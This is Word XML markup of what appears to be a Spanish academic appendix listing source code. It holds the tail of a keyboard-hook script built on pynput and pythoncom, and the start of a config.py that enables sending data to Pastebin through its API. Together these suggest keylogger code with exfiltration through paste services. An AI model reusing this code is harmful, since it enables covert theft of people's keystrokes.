      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">869  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1216"/>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Keyboard</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1217" w:name="l870"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">870  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1217"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1218" w:name="l871"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">871  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1218"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Wait indefinitely</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1219" w:name="l872"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">872  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1219"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>pythoncom</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>PumpMessages</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1220" w:name="l873"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">873  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1220"/>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nput</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1221" w:name="l874"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">874  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="122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nput'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1222" w:name="l875"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">875  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1222"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>keyboard</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>Listener</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>on_press</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>on_press_key_pynput</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>listener</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1223" w:name="l876"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">876  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1223"/>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224" w:name="l877"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">877  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1224"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>listene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225" w:name="l878"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">878  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1225"/>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1226" w:name="l879"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">879  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="122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xcepcion {} en pynput'</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1227" w:name="l880"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">880  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1227"/>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228" w:name="l881"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">881  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1228"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>else:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1229" w:name="l882"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">882  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="122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en parametro hookmodule'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">)      </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># this should not happen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1230" w:name="l883"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">883  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1230"/>
    </w:p>
    <w:p w:rsidR="008772F3" w:rsidRDefault="008772F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="DejaVu Sans" w:hAnsi="Arial" w:cs="DejaVu Sans"/>
          <w:kern w:val="3"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008772F3" w:rsidRDefault="008772F3" w:rsidP="008772F3">
      <w:pPr>
        <w:pStyle w:val="Titulo2NONUMERADO"/>
      </w:pPr>
      <w:bookmarkStart w:id="1231" w:name="_Toc19810122"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Código fuente del fichero de configuración</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1231"/>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148938655"/>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config.py</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">1    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">2    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">3    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">4    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Name:             config.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">5    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Purpose:          This file has the configuration of parameters that vary depending on some systems and</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">6    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t>#                   that has sensitive data such as usernames, passwords and api keys.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">7    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">8    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Author:           Gabriel Marti Fuentes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">9    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Notes:            This file is distributed with some values not established for obvious reasons.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">10   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">11   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">12   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># CONSTANTS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">13   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">14   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">15   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># paste services ids</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">16   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">PASTE_PASTEBIN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">1                                              </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Pastebin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">17   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">PASTE_PASTECODE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">2                                             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Pastecode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">18   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">19   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Pastebin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">20   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">PASTEBIN_ENABLED </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= True                                         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Enable or disable Pastebin send</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">21   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">PASTEBIN_POST_URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'https://pastebin.com/api/api_post.php'     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Post url</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">22   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">PASTEBIN_API_DEV_KEY </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">''                                       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Your Pastebin API key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">23   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">PASTEBIN_USER_NAME </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">''                                         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Username - if not set, then anonymous paste is made</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">24   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">PASTEBIN_PASSWORD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">''                                          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">25   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">PASTEBIN_OPTION </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'paste'                                       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Option</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="1148938655"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">26   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
